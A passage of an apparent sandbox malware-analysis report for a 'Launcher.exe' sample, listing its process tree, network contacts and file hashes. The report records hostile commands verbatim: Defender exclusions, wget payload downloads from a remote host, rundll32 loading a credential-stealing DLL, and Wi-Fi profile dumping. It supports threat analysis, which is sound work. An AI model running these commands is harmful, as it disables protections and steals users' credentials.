60e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin4559
C:\Users\Admin\AppData\Roaming\services\plugin4559
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2604 -ip 2604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 536
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin29017
C:\Users\Admin\AppData\Roaming\services\2plugin29017
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin14170
C:\Users\Admin\AppData\Roaming\services\3plugin14170
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 1160
C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1660
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000012011\988d497ab3.dll, Main
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/1556-22-0x000000007354E000-0x000000007354F000-memory.dmp
memory/1556-23-0x00000000024D0000-0x0000000002506000-memory.dmp
memory/1556-25-0x0000000004F90000-0x00000000055BA000-memory.dmp
memory/1556-24-0x0000000073540000-0x0000000073CF1000-memory.dmp
memory/1556-26-0x0000000004D20000-0x0000000004D42000-memory.dmp
memory/1556-27-0x0000000005730000-0x0000000005796000-memory.dmp
memory/1556-28-0x00000000057A0000-0x0000000005806000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzd5ucll.sc4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1556-37-0x0000000073540000-0x0000000073CF1000-memory.dmp
memory/1556-38-0x00000000058F0000-0x0000000005C47000-memory.dmp
memory/1556-39-0x0000000005CD0000-0x0000000005CEE000-memory.dmp
memory/1556-40-0x0000000005D10000-0x0000000005D5C000-memory.dmp
memory/1556-41-0x0000000006C50000-0x0000000006CE6000-memory.dmp
memory/1556-42-0x0000000006200000-0x000000000621A000-memory.dmp
memory/1556-43-0x0000000006250000-0x0000000006272000-memory.dmp
memory/1556-44-0x0000000007350000-0x00000000078F6000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | 93fde4e38a84c83af842f73b176ab8dc |
| SHA1 | e8c55cc160a0a94e404f544b22e38511b9d71da8 |
| SHA256 | fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03 |
| SHA512 | 48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
memory/988-58-0x000000006FFC0000-0x000000007000C000-memory.dmp
memory/988-57-0x00000000078F0000-0x0000000007924000-memory.dmp
memory/988-67-0x0000000007950000-0x000000000796E000-memory.dmp
memory/988-68-0x0000000007970000-0x0000000007A14000-memory.dmp
memory/988-69-0x0000000008100000-0x000000000877A000-memory.dmp
memory/988-70-0x0000000007B30000-0x0000000007B3A000-memory.dmp
memory/988-71-0x0000000007CB0000-0x0000000007CC1000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/988-74-0x0000000007CF0000-0x0000000007CFE000-memory.dmp
memory/988-75-0x0000000007D00000-0x0000000007D15000-memory.dmp
memory/988-76-0x0000000007D40000-0x0000000007D5A000-memory.dmp
memory/988-77-0x0000000007D30000-0x0000000007D38000-memory.dmp
memory/1160-82-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins17774.rar
| MD5 | 5829add10b7f66e9fb891a34faab675e |
| SHA1 | 0bd24bfa4dc7739968051d530755a3265d8a2fe4 |
| SHA256 | 2f88ec677b3c1b92c76500482f59c5b0172c44abb50d44fb0894f8d15e54b6ec |
| SHA512 | 54cb436a34d1c69eeb03d95d4fcd6ef39893de64dfd193a48f14144f9c958f44427b609c1004cca9546a3e7860dcf6acc4fbd1311f5004f71013689000d46c0a |
C:\Users\Admin\AppData\Roaming\services\plugin4559
| MD5 | 1b7cc96226d6ac15718fbc035435cdfe |
| SHA1 | 514747a446585d3922b13de79d3afecbc7d4863b |
| SHA256 | 5aec3edecf0c3dc4a49d432f4ca60397e7a83b3080d290d65c7753372b069470 |
| SHA512 | f0579757d4bc9385c6bcda0a6b8815fe9b9b6099a877f98a80850ae80d911a90ec0f3b94f86c8b2aed1a54b568fcce9c7d414332b7a673550e977e795ef65fc3 |
memory/2604-95-0x0000000004790000-0x0000000004B90000-memory.dmp
memory/2604-96-0x0000000004790000-0x0000000004B90000-memory.dmp
memory/2604-97-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/2604-99-0x0000000077390000-0x00000000775E2000-memory.dmp
memory/4028-100-0x00000000008E0000-0x00000000008E9000-memory.dmp
memory/4028-102-0x0000000002500000-0x0000000002900000-memory.dmp
memory/4028-103-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/4028-105-0x0000000077390000-0x00000000775E2000-memory.dmp
memory/2604-106-0x0000000000400000-0x0000000001A2F000-memory.dmp
memory/1556-107-0x000000007354E000-0x000000007354F000-memory.dmp
memory/1556-108-0x0000000073540000-0x0000000073CF1000-memory.dmp
memory/3672-109-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/1556-110-0x0000000073540000-0x0000000073CF1000-memory.dmp
memory/3672-113-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 4332e63ed4651ab6163297a1b3521b15 |
| SHA1 | 1ba54cde45c9205f18fa4642b8d2430719063cc6 |
| SHA256 | 6111f7bddb6f125b3046c765ac210a0ab0704f9ffdb8af232e8e321a842b5c62 |
| SHA512 | f17f06c5d367523927a1a134bbd0f90743e176d7be991207409bab8fac460ec0505ecc9316e58c66c5d470d7b281fd25785b196e571f3480c39af4c97ae1d83a |
C:\Users\Admin\AppData\Roaming\services\02plugins13079.rar
| MD5 | abd187f0e53c1502113774b5be2be89b |
| SHA1 | 70d90546bb191892666ba0dbc8330137f5593c67 |
| SHA256 | 763eaffad962a810443b3b47e45ba17f8d57bf1f65c21416840c6f2bbb3ce82c |
| SHA512 | 17a0c3bffdec3f38b3fe15c42608561f4bab8cbd43208c652628b603d665eb0ced9a7bc2f1479b3b33654e88cc7587fc11c4d643437eab6fef9a7ac909172460 |
C:\Users\Admin\AppData\Roaming\services\2plugin29017
| MD5 | 26427f98c7f37c1472d0bb2e8fac6a19 |
| SHA1 | d1fb3f199565b9a84d39eb23da8d6c7858cda859 |
| SHA256 | 827142857439abbdcd5c849637ac98987f1b1b38c39049bb8ad10914b306150a |
| SHA512 | de610f72e71fb5a971d89cad25df789bb2aeec5d47cdf9ad7ede1301e1ec54814a4a692c391aaba681454498e45de28ae320eebe295000ae6ff6e4e8c03e7f32 |
memory/2708-123-0x00007FFF6B5F0000-0x00007FFF6B5F2000-memory.dmp
memory/2708-124-0x00007FFF6B600000-0x00007FFF6B602000-memory.dmp
memory/2708-125-0x0000000140000000-0x0000000140E43000-memory.dmp
memory/1248-129-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins17346.rar
| MD5 | aeac6a1a5a22e7e29423e30d6c74c679 |
| SHA1 | c6f6461b140287d073361fc184571821ccb54e90 |
| SHA256 | 8db6963e7dc66543cbe264316585e01f7cbc5014929cb614bb1b0dd847a24e85 |
| SHA512 | 9e26ac6a41ee390b1f2aaebf6d33a79e4bdc175439f396de504891f7749411f385bc92639b2b5e88efd8b3d301580b157bc0e2ed11e63a51a0b1878217e41e9b |
C:\Users\Admin\AppData\Roaming\services\3plugin14170
| MD5 | a6cb8ead79badac2f7c62036a6be1980 |
| SHA1 | 861883f46cd670ce671ffe0961ea3fe493afbc3d |
| SHA256 | 904977d248102149dd406dd63c659fc922b67b04e2d6b6a5039e0764f4fb0c04 |
| SHA512 | 5db90066b39a751c6102fef1cfc04cf2946e8742b7ce2cb3c992cb4fc1b31891112df59ee9a8fcb8cd801f391aef7fc9d8c31f93d35c6fdc230b78edd86cd11c |
memory/1516-150-0x0000000000400000-0x0000000002B8F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000012011\988d497ab3.dll
| MD5 | 502f859ec674fb1023764e93921b5542 |
| SHA1 | 4e80c651043d2dc1c682ef9fe9e5181abd399adf |
| SHA256 | ae9d87a76527f3d3df30a62db1fab2a669d73c3f3cdd3b366016142036056e40 |
| SHA512 | 83e65d572d12c4ba2278366e225a3e7842bebbc0108f3de0d319b5504d6c2d9c99157a29e476fb6c1da28f69652565f1a1fcf7b74ed3713a097de7e40d158392 |
memory/4984-161-0x0000000010000000-0x0000000010256000-memory.dmp
memory/4984-163-0x0000000002CF0000-0x0000000002E12000-memory.dmp
memory/4984-164-0x0000000002E20000-0x0000000002F24000-memory.dmp
memory/4984-165-0x0000000002E20000-0x0000000002F24000-memory.dmp
memory/4984-167-0x0000000002E20000-0x0000000002F24000-memory.dmp
memory/3780-173-0x00000234FB270000-0x00000234FB292000-memory.dmp
C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll
| MD5 | 5018b05026a59499aadb6ec08f4a0390 |
| SHA1 | e92da4c4350064d7f9dcc4afbbc48a8ed317a352 |
| SHA256 | 095ded227779ff91573f4e2174e31ded242a0c452ceefd0d1bb2761ffa19977c |
| SHA512 | 47742751f577453cb155cf7f88c23df3cd21163f1844fb14f94239fac121712320fd312b6557d173bdeb2b0b6da74cb7ab2a573aa11828e54db325c32aeacdca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 089459c8d686ef358cbb96e4a8087cf0 |
| SHA1 | 3826286e990188cd72563c06b742b14e821949d9 |
| SHA256 | d5ad6120640c9f591839f60f1351f41c5e4daf3b262f95a8cf94713dd07f717b |
| SHA512 | e5ff14e01f295d9c14b303ca505d9b5a9a0b36b6b41990f0728c98cf5f82cf1f2a15f512be65a30289cb803d917752236231c296185fdc3b0284f70a17360a60 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 76b52ccdb5682f80e9830a765e4f9604 |
| SHA1 | e0f063114a8463b5a6f44858738a7ffdc2fe9061 |
| SHA256 | 2428d24df851b6e7b5cfa7a1d76e19e0f853ae0f63d95675d1e6d2f73685ee7e |
| SHA512 | af544fcaf4702a619aeaa1534069fcfd82afd74402d6a58318ebd949ee47d55fc0043aa87a499864174e5cda1b47bd0ba0f90d441f974de1c50840b21a8fefad |
memory/3552-190-0x0000000000400000-0x0000000002B8F000-memory.dmp
